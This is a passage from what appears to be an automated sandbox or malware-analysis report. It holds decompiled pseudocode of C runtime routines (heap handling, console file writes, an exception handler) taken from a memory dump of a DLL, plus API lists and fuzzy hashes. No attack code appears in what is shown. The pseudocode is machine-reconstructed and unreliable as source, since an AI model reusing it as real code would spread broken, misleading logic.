																									_t326 = E6E1E1C3C( &_v536,  *0x6e2851e8, 0xfe);
																									_t482 = _t482 + 0xc;
																									__eflags = _t326;
																									_t460[1] = 0 | _t326 == 0x00000000;
																								}
																								_t193 = _t435 + 8; // 0x8b018b
																								 *_t460 =  *_t193;
																							}
																							 *(_t435 + 0x18) = _t460[1];
																							goto L123;
																						}
																						__eflags = _t428;
																						if(_t428 != 0) {
																							 *_t460 =  *(_t460 + _t428 * 8);
																							_t460[1] =  *(_t460 + 4 + _t428 * 8);
																							 *(_t460 + _t428 * 8) = _v728;
																							 *(_t460 + 4 + _t428 * 8) = _v716;
																						}
																						goto L112;
																					}
																					L123:
																					_t300 = _t367 * 0xc;
																					_t200 = _t300 + 0x6e230de8; // 0x6e1c815c
																					 *0x6e22a26c(_t435);
																					_t302 =  *((intOrPtr*)( *_t200))();
																					_t401 = _v732;
																					__eflags = _t302;
																					if(_t302 == 0) {
																						__eflags = _t401 - 0x6e2852b0;
																						if(_t401 != 0x6e2852b0) {
																							_t459 = _t367 + _t367;
																							__eflags = _t459;
																							asm("lock xadd [eax], ecx");
																							if(_t459 != 0) {
																								goto L128;
																							} else {
																								_t218 = _t459 * 8; // 0x10468b00
																								E6E20CBD3( *((intOrPtr*)(_t435 + _t218 + 0x28)));
																								_t221 = _t459 * 8; // 0x3b8e8
																								E6E20CBD3( *((intOrPtr*)(_t435 + _t221 + 0x24)));
																								_t224 = _t367 * 4; // 0xe764e850
																								E6E20CBD3( *((intOrPtr*)(_t435 + _t224 + 0xa0)));
																								_t404 = _v712;
																								 *((intOrPtr*)(_v724 + _t435)) = _t404;
																								 *(_t435 + 0xa0 + _t367 * 4) = _t404;
																							}
																						}
																						_t402 = _v740;
																						 *_t402 = 1;
																						 *((intOrPtr*)(_t435 + 0x28 + (_t367 + _t367) * 8)) = _t402;
																					} else {
																						 *(_v724 + _t435) = _t401;
																						_t205 = _t367 * 4; // 0xe764e850
																						E6E20CBD3( *((intOrPtr*)(_t435 + _t205 + 0xa0)));
																						 *(_t435 + 0xa0 + _t367 * 4) = _v744;
																						E6E20CBD3(_v740);
																						 *(_t435 + 8) = _v748;
																						goto L86;
																					}
																					goto L87;
																				}
																			}
																		} else {
																			goto L87;
																		}
																		goto L131;
																	}
																	asm("sbb eax, eax");
																	_t284 = _t283 | 0x00000001;
																	__eflags = _t284;
																	goto L95;
																} else {
																	L86:
																	__eflags = 0;
																	L87:
																	_pop(_t456);
																	__eflags = _v16 ^ _t468;
																	return E6E1DF8A5(_v16 ^ _t468, _t428, _t456);
																}
															} else {
																_t333 = _t450 + _t450;
																__eflags = _t333 - 0x106;
																if(_t333 >= 0x106) {
																	E6E1E03A9();
																	goto L83;
																} else {
																	 *((short*)(_t466 + _t333 - 0x10c)) = 0;
																	_t335 =  &_v276;
																	_push(_t335);
																	_push(_v460);
																	_push(_t431);
																	L84();
																	_t475 = _t478 + 0xc;
																	__eflags = _t335;
																	_t270 = _v452;
																	if(_t335 != 0) {
																		_t270 = _t270 + 1;
																		_v452 = _t270;
																	}
																	L55:
																	_t447 = _t362 + _t450 * 2;
																	_t373 = 0;
																	__eflags =  *_t447;
																	if( *_t447 == 0) {
																		L57:
																		__eflags = _t270;
																		L78:
																		if(__eflags != 0) {
																			goto L80;
																		} else {
																		}
																		goto L81;
																	} else {
																		_t447 = _t447 + 2;
																		__eflags =  *_t447;
																		if( *_t447 != 0) {
																			continue;
																		} else {
																			goto L57;
																		}
																	}
																}
															}
														}
													} else {
														_t336 = 0x3b;
														__eflags =  *_t362 - _t336;
														if( *_t362 != _t336) {
															break;
														} else {
															goto L49;
														}
													}
												}
											}
											goto L131;
										}
										goto L81;
									}
								}
							}
						}
					} else {
						__eflags = _t447;
						if(_t447 != 0) {
							_push(_t447);
							_push(_t251);
							_push(_t431);
							L84();
						}
						L81:
						_pop(_t448);
						__eflags = _v12 ^ _t466;
						return E6E1DF8A5(_v12 ^ _t466, _t425, _t448);
					}
				}
				L131:
			}

0x6e20e506
0x6e20e509
0x6e20e50b
0x6e20e50e
0x6e20e50f
0x6e20e518
0x6e20e520
0x6e20e522
0x6e20e524
0x6e20e527
0x6e20e640
0x6e20e645
0x6e20e52d
0x6e20e52d
0x6e20e52e
0x6e20e52e
0x6e20e531
0x6e20e534
0x6e20e536
0x6e20e539
0x6e20e539
0x6e20e53c
0x6e20e53e
0x6e20e541
0x6e20e546
0x6e20e554
0x6e20e55e
0x6e20e561
0x6e20e564
0x6e20e564
0x6e20e56f
0x6e20e574
0x6e20e579
0x00000000
0x6e20e57f
0x6e20e582
0x6e20e582
0x6e20e585
0x6e20e587
0x6e20e58a
0x6e20e58a
0x6e20e58a
0x6e20e58c
0x6e20e58c
0x6e20e58c
0x6e20e592
0x00000000
0x00000000
0x6e20e597
0x6e20e5ae
0x6e20e5ae
0x6e20e599
0x6e20e599
0x6e20e5a1
0x00000000
0x6e20e5a3
0x6e20e5a3
0x6e20e5a6
0x6e20e5ac
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20e5ac
0x6e20e5a1
0x6e20e5b7
0x6e20e5bc
0x6e20e5be
0x6e20e5c3
0x6e20e5c6
0x6e20e5c9
0x6e20e5cc
0x6e20e5cf
0x6e20e5d1
0x6e20e5d6
0x6e20e5e0
0x6e20e5e8
0x6e20e5f0
0x00000000
0x6e20e5f6
0x6e20e5fa
0x6e20e647
0x6e20e64d
0x6e20e650
0x6e20e653
0x6e20e655
0x6e20e659
0x6e20e65d
0x6e20e65f
0x6e20e662
0x6e20e667
0x6e20e65d
0x6e20e668
0x6e20e66b
0x6e20e66d
0x6e20e66f
0x6e20e673
0x6e20e674
0x6e20e676
0x6e20e679
0x6e20e67e
0x6e20e674
0x6e20e681
0x6e20e684
0x6e20e687
0x6e20e68a
0x6e20e68d
0x6e20e68d
0x6e20e5fc
0x6e20e5fc
0x6e20e5ff
0x6e20e602
0x6e20e604
0x6e20e608
0x6e20e60c
0x6e20e60e
0x6e20e611
0x6e20e616
0x6e20e60c
0x6e20e617
0x6e20e61c
0x6e20e61e
0x6e20e623
0x6e20e625
0x6e20e628
0x6e20e62d
0x6e20e623
0x6e20e62e
0x6e20e632
0x6e20e632
0x6e20e635
0x6e20e639
0x6e20e63c
0x6e20e63c
0x00000000
0x6e20e63f
0x00000000
0x6e20e5f0
0x6e20e5b2
0x6e20e5b4
0x6e20e5b4
0x00000000
0x6e20e5b4
0x6e20e694
0x6e20e695
0x6e20e696
0x6e20e697
0x6e20e698
0x6e20e699
0x6e20e69e
0x6e20e6a1
0x6e20e6a2
0x6e20e6a4
0x6e20e6b1
0x6e20e6b4
0x6e20e6b7
0x6e20e6b8
0x6e20e6b9
0x6e20e6bc
0x6e20e6bd
0x6e20e6c0
0x6e20e6c6
0x6e20e6c8
0x6e20e6ed
0x6e20e6f7
0x6e20e6fd
0x6e20e6ff
0x6e20e705
0x6e20e707
0x6e20e95a
0x6e20e95b
0x00000000
0x6e20e70d
0x6e20e70d
0x6e20e711
0x6e20e878
0x6e20e88f
0x6e20e894
0x6e20e897
0x6e20e899
0x6e20e89f
0x6e20e89f
0x6e20e8a1
0x6e20e8a1
0x6e20e8a4
0x6e20e8a6
0x6e20e8ac
0x6e20e8ac
0x6e20e8ae
0x6e20e935
0x6e20e935
0x6e20e8b4
0x6e20e8b4
0x6e20e8b6
0x6e20e8bc
0x6e20e8bf
0x6e20e8c2
0x6e20e8c8
0x00000000
0x00000000
0x6e20e8ca
0x6e20e8ce
0x6e20e8f7
0x6e20e8f7
0x6e20e8f9
0x6e20e8d0
0x6e20e8d0
0x6e20e8d4
0x6e20e8d8
0x6e20e8df
0x6e20e8e5
0x00000000
0x6e20e8e7
0x6e20e8e7
0x6e20e8ea
0x6e20e8ed
0x6e20e8f5
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20e8f5
0x6e20e8e5
0x6e20e904
0x6e20e904
0x6e20e906
0x6e20e934
0x6e20e934
0x00000000
0x6e20e908
0x6e20e908
0x6e20e90e
0x6e20e90f
0x6e20e910
0x6e20e911
0x6e20e916
0x6e20e91c
0x6e20e91f
0x6e20e921
0x6e20e928
0x6e20e92a
0x6e20e92c
0x6e20e923
0x6e20e923
0x6e20e924
0x00000000
0x6e20e924
0x6e20e921
0x00000000
0x6e20e906
0x6e20e8fd
0x6e20e8ff
0x6e20e902
0x6e20e902
0x00000000
0x6e20e902
0x6e20e93b
0x6e20e93b
0x6e20e93c
0x6e20e93f
0x6e20e945
0x6e20e945
0x6e20e94e
0x6e20e950
0x00000000
0x6e20e952
0x6e20e952
0x00000000
0x6e20e952
0x6e20e950
0x00000000
0x6e20e717
0x6e20e717
0x6e20e71c
0x00000000
0x6e20e722
0x6e20e722
0x6e20e727
0x00000000
0x6e20e72d
0x6e20e72d
0x6e20e733
0x6e20e738
0x6e20e73a
0x6e20e741
0x6e20e742
0x6e20e744
0x00000000
0x00000000
0x6e20e74a
0x6e20e74a
0x6e20e74e
0x6e20e754
0x00000000
0x6e20e75a
0x6e20e75c
0x6e20e75d
0x6e20e760
0x00000000
0x6e20e766
0x6e20e766
0x6e20e76c
0x6e20e771
0x6e20e77b
0x6e20e77f
0x6e20e784
0x6e20e787
0x6e20e789
0x00000000
0x6e20e78b
0x6e20e78b
0x6e20e78d
0x6e20e790
0x6e20e790
0x6e20e793
0x6e20e796
0x6e20e796
0x6e20e7a1
0x6e20e7a3
0x6e20e7a5
0x00000000
0x00000000
0x6e20e7a5
0x00000000
0x6e20e7a7
0x6e20e7a7
0x6e20e7ad
0x6e20e7b0
0x6e20e7b0
0x6e20e7be
0x6e20e7c7
0x6e20e7cc
0x6e20e7d2
0x6e20e7d5
0x6e20e7d6
0x6e20e7d8
0x6e20e7e6
0x6e20e7e6
0x6e20e7ed
0x6e20e84e
0x00000000
0x6e20e7ef
0x6e20e7ef
0x6e20e7fd
0x6e20e802
0x6e20e805
0x6e20e807
0x6e20e977
0x6e20e979
0x6e20e97a
0x6e20e97b
0x6e20e97c
0x6e20e97d
0x6e20e97e
0x6e20e983
0x6e20e986
0x6e20e987
0x6e20e996
0x6e20e999
0x6e20e99a
0x6e20e99d
0x6e20e9a1
0x6e20e9a2
0x6e20e9a5
0x6e20e9b5
0x6e20e9d8
0x6e20e9dd
0x6e20e9e0
0x6e20e9e2
0x6e20e9f7
0x6e20e9fa
0x6e20e9fa
0x6e20e9fd
0x6e20ea03
0x6e20ea09
0x6e20ea0c
0x6e20ea0e
0x6e20ea11
0x6e20ea18
0x6e20ea1b
0x6e20ea21
0x00000000
0x00000000
0x6e20ea23
0x6e20ea27
0x6e20ea50
0x6e20ea50
0x6e20ea29
0x6e20ea29
0x6e20ea2d
0x6e20ea31
0x6e20ea38
0x6e20ea3e
0x00000000
0x6e20ea40
0x6e20ea40
0x6e20ea43
0x6e20ea46
0x6e20ea4e
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20ea4e
0x6e20ea3e
0x6e20ea5d
0x6e20ea5d
0x6e20ea5f
0x6e20ea65
0x6e20ea6b
0x6e20ea6e
0x6e20ea6e
0x6e20ea71
0x6e20ea74
0x6e20ea74
0x6e20ea84
0x6e20ea92
0x6e20ea97
0x6e20ea9e
0x6e20eaa0
0x00000000
0x6e20eaa6
0x6e20eaac
0x6e20eab2
0x6e20eab9
0x6e20eabf
0x6e20eac2
0x6e20eac8
0x6e20ead5
0x6e20eadc
0x6e20eae1
0x6e20eae4
0x6e20eae6
0x6e20ed3f
0x6e20ed45
0x6e20ed46
0x6e20ed47
0x6e20ed48
0x6e20ed49
0x6e20ed4a
0x6e20ed4f
0x6e20ed50
0x6e20ed5b
0x6e20ed63
0x6e20ed69
0x6e20ed6c
0x6e20ed71
0x6e20eaec
0x6e20eaec
0x6e20eafa
0x6e20eafd
0x6e20eb18
0x6e20eb1f
0x6e20eb25
0x6e20eb2b
0x6e20eaff
0x6e20eaff
0x6e20eb07
0x00000000
0x6e20eb09
0x6e20eb09
0x6e20eb0f
0x6e20eb0f
0x6e20eb07
0x6e20eb32
0x6e20eb35
0x6e20ec52
0x6e20ec55
0x6e20ec62
0x6e20ec65
0x6e20ec6d
0x6e20ec6d
0x6e20ec57
0x6e20ec5d
0x6e20ec5d
0x6e20eb3b
0x6e20eb3b
0x6e20eb41
0x6e20eb49
0x6e20eb4b
0x6e20eb4e
0x6e20eb57
0x6e20eb60
0x6e20eb66
0x6e20eb66
0x6e20eb69
0x6e20eb6b
0x00000000
0x00000000
0x6e20eb6d
0x6e20eb73
0x6e20eb74
0x6e20eb7f
0x6e20eb87
0x6e20eb8f
0x6e20eb92
0x6e20eb95
0x6e20eb9b
0x6e20eba1
0x6e20eba7
0x6e20ebad
0x6e20ebb0
0x00000000
0x00000000
0x6e20ebb2
0x6e20ebd7
0x6e20ebd7
0x6e20ebda
0x6e20ebde
0x6e20ebf7
0x6e20ebfc
0x6e20ebff
0x6e20ec01
0x6e20ec07
0x6e20ec42
0x6e20ec09
0x6e20ec09
0x6e20ec0e
0x6e20ec16
0x6e20ec17
0x6e20ec17
0x6e20ec2e
0x6e20ec35
0x6e20ec38
0x6e20ec3d
0x6e20ec3d
0x6e20ec45
0x6e20ec48
0x6e20ec48
0x6e20ec4d
0x00000000
0x6e20ec4d
0x6e20ebb4
0x6e20ebb6
0x6e20ebbb
0x6e20ebc1
0x6e20ebca
0x6e20ebd3
0x6e20ebd3
0x00000000
0x6e20ebb6
0x6e20ec70
0x6e20ec70
0x6e20ec74
0x6e20ec7c
0x6e20ec82
0x6e20ec85
0x6e20ec8b
0x6e20ec8d
0x6e20eccd
0x6e20ecd3
0x6e20ecda
0x6e20ecda
0x6e20ece0
0x6e20ece4
0x00000000
0x6e20ece6
0x6e20ece6
0x6e20ecea
0x6e20ecef
0x6e20ecf3
0x6e20ecf8
0x6e20ecff
0x6e20ed0d
0x6e20ed13
0x6e20ed16
0x6e20ed16
0x6e20ece4
0x6e20ed25
0x6e20ed2d
0x6e20ed36
0x6e20ec8f
0x6e20ec95
0x6e20ec98
0x6e20ec9f
0x6e20ecb1
0x6e20ecb8
0x6e20ecc5
0x00000000
0x6e20ecc5
0x00000000
0x6e20ec8d
0x6e20eae6
0x6e20ea61
0x00000000
0x6e20ea61
0x00000000
0x6e20ea5f
0x6e20ea58
0x6e20ea5a
0x6e20ea5a
0x00000000
0x6e20e9e4
0x6e20e9e4
0x6e20e9e4
0x6e20e9e6
0x6e20e9ea
0x6e20e9eb
0x6e20e9f6
0x6e20e9f6
0x6e20e80d
0x6e20e80d
0x6e20e810
0x6e20e815
0x6e20e972
0x00000000
0x6e20e81b
0x6e20e81d
0x6e20e825
0x6e20e82b
0x6e20e82c
0x6e20e832
0x6e20e833
0x6e20e838
0x6e20e83b
0x6e20e83d
0x6e20e843
0x6e20e845
0x6e20e846
0x6e20e846
0x6e20e854
0x6e20e854
0x6e20e857
0x6e20e859
0x6e20e85c
0x6e20e86a
0x6e20e86a
0x6e20e954
0x6e20e954
0x00000000
0x6e20e956
0x6e20e956
0x00000000
0x6e20e85e
0x6e20e85e
0x6e20e861
0x6e20e864
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20e864
0x6e20e85c
0x6e20e815
0x6e20e807
0x6e20e7da
0x6e20e7dc
0x6e20e7dd
0x6e20e7e0
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20e7e0
0x6e20e7d8
0x6e20e760
0x00000000
0x6e20e754
0x00000000
0x6e20e871
0x6e20e727
0x6e20e71c
0x6e20e711
0x6e20e6ca
0x6e20e6ca
0x6e20e6cc
0x6e20e6ce
0x6e20e6cf
0x6e20e6d0
0x6e20e6d1
0x6e20e6d6
0x6e20e961
0x6e20e965
0x6e20e966
0x6e20e971
0x6e20e971
0x6e20e6c8
0x00000000

APIs

Part of subcall function 6E20F26D: RtlAllocateHeap.NTDLL(00000000,6E1C75D9,00000000,?,6E1E0F8B,00000002,00000000,?,?,?,6E1A1298,6E1C75D9,00000004,00000000,00000000,00000000), ref: 6E20F29F

_free.LIBCMT ref: 6E20E611
_free.LIBCMT ref: 6E20E628
_free.LIBCMT ref: 6E20E647
_free.LIBCMT ref: 6E20E662
_free.LIBCMT ref: 6E20E679

Strings

#n, xrefs: 6E20E559

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: #n
API String ID: 3033488037-925149467
Opcode ID: 2f81099a7197d0b99bc0e47f601abe025e0428cede12dabac87d69d0a56cc3b4
Instruction ID: 20c82b030b8189ffe1d036cc3c03ed7ee8726b33421a92d4597d30def46bcee3
Opcode Fuzzy Hash: 2f81099a7197d0b99bc0e47f601abe025e0428cede12dabac87d69d0a56cc3b4
Instruction Fuzzy Hash: A8510675A1030DAFDB50CFA9D841AAAB7FAEF45725F100969E809DB2D0E731E980CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E212C2B, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E212C2B(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __esi;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				signed int _t129;
				signed char* _t131;
				intOrPtr* _t132;
				signed int _t133;
				void* _t134;

				_v8 =  *0x6e28506c ^ _t133;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t131 = _a12;
				_v52 = _t131;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6e2876f8 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t131;
				_t86 = GetConsoleCP();
				_t132 = _a4;
				_v60 = _t86;
				 *_t132 = 0;
				 *((intOrPtr*)(_t132 + 4)) = 0;
				 *((intOrPtr*)(_t132 + 8)) = 0;
				while(_t131 < _v40) {
					_v28 = 0;
					_v31 =  *_t131;
					_t129 =  *(0x6e2876f8 + _v48 * 4);
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						_t92 = E6E20367B(_t116, _t129);
						_t129 = 0x8000;
						if(( *(_t92 + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t131);
							goto L8;
						} else {
							if(_t131 >= _v40) {
								_t129 = _v48;
								 *((char*)( *((intOrPtr*)(0x6e2876f8 + _t129 * 4)) + _t116 + 0x2e)) =  *_t131;
								 *( *((intOrPtr*)(0x6e2876f8 + _t129 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6e2876f8 + _t129 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
							} else {
								_t112 = E6E20CF1B( &_v28, _t131, 2);
								_t134 = _t134 + 0xc;
								if(_t112 != 0xffffffff) {
									_t131 =  &(_t131[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E6E20CF1B();
						_t134 = _t134 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t131 =  &(_t131[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t132 = GetLastError();
								} else {
									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E6E1DF8A5(_v8 ^ _t133, _t129, _t132);
			}

0x6e212c3a
0x6e212c3d
0x6e212c45
0x6e212c49
0x6e212c55
0x6e212c58
0x6e212c5b
0x6e212c62
0x6e212c6a
0x6e212c6d
0x6e212c73
0x6e212c79
0x6e212c7e
0x6e212c80
0x6e212c83
0x6e212c88
0x6e212c92
0x6e212c99
0x6e212c9c
0x6e212ca3
0x6e212caa
0x6e212cc5
0x6e212ccd
0x6e212cd6
0x6e212cfc
0x6e212cfe
0x00000000
0x6e212cd8
0x6e212cdb
0x6e212da2
0x6e212dae
0x6e212db9
0x6e212dbe
0x6e212ce1
0x6e212ce8
0x6e212ced
0x6e212cf3
0x6e212cf9
0x00000000
0x6e212cf9
0x6e212cf3
0x6e212cdb
0x6e212cac
0x6e212cb0
0x6e212cb3
0x6e212cb9
0x6e212cbb
0x6e212cbe
0x6e212cc2
0x6e212cff
0x6e212d02
0x6e212d03
0x6e212d08
0x6e212d0e
0x6e212d14
0x6e212d23
0x6e212d29
0x6e212d2f
0x6e212d34
0x6e212d50
0x6e212dc3
0x6e212dc9
0x6e212d52
0x6e212d5a
0x6e212d63
0x6e212d69
0x00000000
0x6e212d6b
0x6e212d6d
0x6e212d70
0x6e212d89
0x00000000
0x6e212d8b
0x6e212d8f
0x6e212d91
0x6e212d94
0x00000000
0x6e212d94
0x6e212d8f
0x6e212d89
0x6e212d69
0x6e212d63
0x6e212d50
0x6e212d34
0x6e212d0e
0x00000000
0x6e212d97
0x6e212d97
0x6e212dcb
0x6e212ddd

APIs

GetConsoleCP.KERNEL32(00000000,?,?,?,?,?,?,?,?,6E2133A0,?,?,00000000,?,?,?), ref: 6E212C6D
__fassign.LIBCMT ref: 6E212CE8
__fassign.LIBCMT ref: 6E212D03
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 6E212D29
WriteFile.KERNEL32(?,00000000,00000000,6E2133A0,00000000,?,?,?,?,?,?,?,?,?,6E2133A0,?), ref: 6E212D48
WriteFile.KERNEL32(?,?,00000001,6E2133A0,00000000,?,?,?,?,?,?,?,?,?,6E2133A0,?), ref: 6E212D81

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 74ff004bb44e5b1714468114b42a2bda59143af8606f92a116811cdd415c799b
Instruction ID: 1a06ea1de8df4813e6822bc28187c410ee213ba68e5235ad8882336130b4ef33
Opcode Fuzzy Hash: 74ff004bb44e5b1714468114b42a2bda59143af8606f92a116811cdd415c799b
Instruction Fuzzy Hash: 1451A6B190460E9FDB00CFA8C885ADEBBF9EF0A310F14455AF955E7281D730DA51DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E3F60, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E6E1E3F60(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				long _v40;
				signed int _t48;
				char _t51;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				void* _t66;
				long _t68;
				long _t70;
				intOrPtr _t74;
				signed int _t78;
				char _t80;
				intOrPtr _t83;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t93;
				long _t95;
				long _t97;
				void* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t105;
				void* _t112;

				_t86 = __edx;
				_push(__ebx);
				_t74 = _a8;
				_push(__edi);
				_v5 = 0;
				_t93 = _t74 + 0x10;
				_t48 =  *(_t74 + 8) ^  *0x6e28506c;
				_push(_t93);
				_push(_t48);
				_v16 = 1;
				_v20 = _t93;
				_v12 = _t48;
				E6E1E3F20(_t74, __edx);
				E6E1E5267(_a12);
				_t51 = _a4;
				_t105 = _t104 + 0xc;
				_t90 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t51 + 4) & 0x00000066) != 0) {
					__eflags = _t90 - 0xfffffffe;
					if(_t90 != 0xfffffffe) {
						_t86 = 0xfffffffe;
						E6E1E5920(_t74, 0xfffffffe, _t93, 0x6e28506c);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t51;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t90 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t20 = _t90 + 2; // 0x3
							_t58 = _t90 + _t20 * 2;
							_t74 =  *((intOrPtr*)(_t78 + _t58 * 4));
							_t59 = _t78 + _t58 * 4;
							_t79 =  *((intOrPtr*)(_t59 + 4));
							_v24 = _t59;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								_t80 = _v5;
								goto L8;
							} else {
								_t86 = _t93;
								_t60 = E6E1E58D0(_t79, _t93);
								_t80 = 1;
								_v5 = 1;
								_t112 = _t60;
								if(_t112 < 0) {
									_v16 = 0;
									L14:
									_push(_t93);
									_push(_v12);
									E6E1E3F20(_t74, _t86);
									goto L15;
								} else {
									if(_t112 > 0) {
										_t61 = _a4;
										__eflags =  *_t61 - 0xe06d7363;
										if( *_t61 == 0xe06d7363) {
											__eflags =  *0x6e22e698;
											if(__eflags != 0) {
												_t70 = E6E227400(__eflags, 0x6e22e698);
												_t105 = _t105 + 4;
												__eflags = _t70;
												if(_t70 != 0) {
													_t97 =  *0x6e22e698; // 0x6e1e3b1a
													 *0x6e22a26c(_a4, 1);
													 *_t97();
													_t93 = _v20;
													_t105 = _t105 + 8;
												}
												_t61 = _a4;
											}
										}
										_t87 = _t61;
										E6E1E5904(_t61, _a8, _t61);
										_t63 = _a8;
										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t90;
										if( *((intOrPtr*)(_t63 + 0xc)) != _t90) {
											_t87 = _t90;
											E6E1E5920(_t63, _t90, _t93, 0x6e28506c);
											_t63 = _a8;
										}
										_push(_t93);
										_push(_v16);
										 *((intOrPtr*)(_t63 + 0xc)) = _t74;
										E6E1E3F20(_t74, _t87);
										_t88 = _t93;
										_t83 =  *((intOrPtr*)(_v28 + 8));
										E6E1E58E8();
										asm("int3");
										_t100 = _t98;
										_t102 = _t100;
										_push(_t102);
										_push(_t93);
										_t95 = _v40;
										__eflags = _t95 - 0xffffffe0;
										if(_t95 > 0xffffffe0) {
											L32:
											 *((intOrPtr*)(E6E202281())) = 0xc;
											_t66 = 0;
											__eflags = 0;
										} else {
											__eflags = _t95;
											if(_t95 == 0) {
												_t95 = _t95 + 1;
											}
											while(1) {
												_t66 = RtlAllocateHeap( *0x6e287b04, 0, _t95); // executed
												__eflags = _t66;
												if(_t66 != 0) {
													break;
												}
												__eflags = E6E21BEB2();
												if(__eflags == 0) {
													goto L32;
												} else {
													_t68 = E6E209256(_t74, _t83, _t88, _t90, __eflags, _t95);
													_pop(_t83);
													__eflags = _t68;
													if(_t68 == 0) {
														goto L32;
													} else {
														continue;
													}
												}
												goto L33;
											}
										}
										L33:
										return _t66;
									} else {
										goto L8;
									}
								}
							}
							goto L34;
							L8:
							_t90 = _t74;
						} while (_t74 != 0xfffffffe);
						if(_t80 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L34:
			}

APIs

_ValidateLocalCookies.LIBCMT ref: 6E1E3F8B
___except_validate_context_record.LIBVCRUNTIME ref: 6E1E3F93
_ValidateLocalCookies.LIBCMT ref: 6E1E4021
__IsNonwritableInCurrentImage.LIBCMT ref: 6E1E404C
_ValidateLocalCookies.LIBCMT ref: 6E1E40A1

Strings

csm, xrefs: 6E1E4036

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: c6d3dff157a71dbcc2c54bb81fcbd19c58129389197c44339c49d14aa92eba58
Instruction ID: f43d5cafab773b556b1020f533bae03a97185ebd41a838ff66daa9ac4055631e
Opcode Fuzzy Hash: c6d3dff157a71dbcc2c54bb81fcbd19c58129389197c44339c49d14aa92eba58
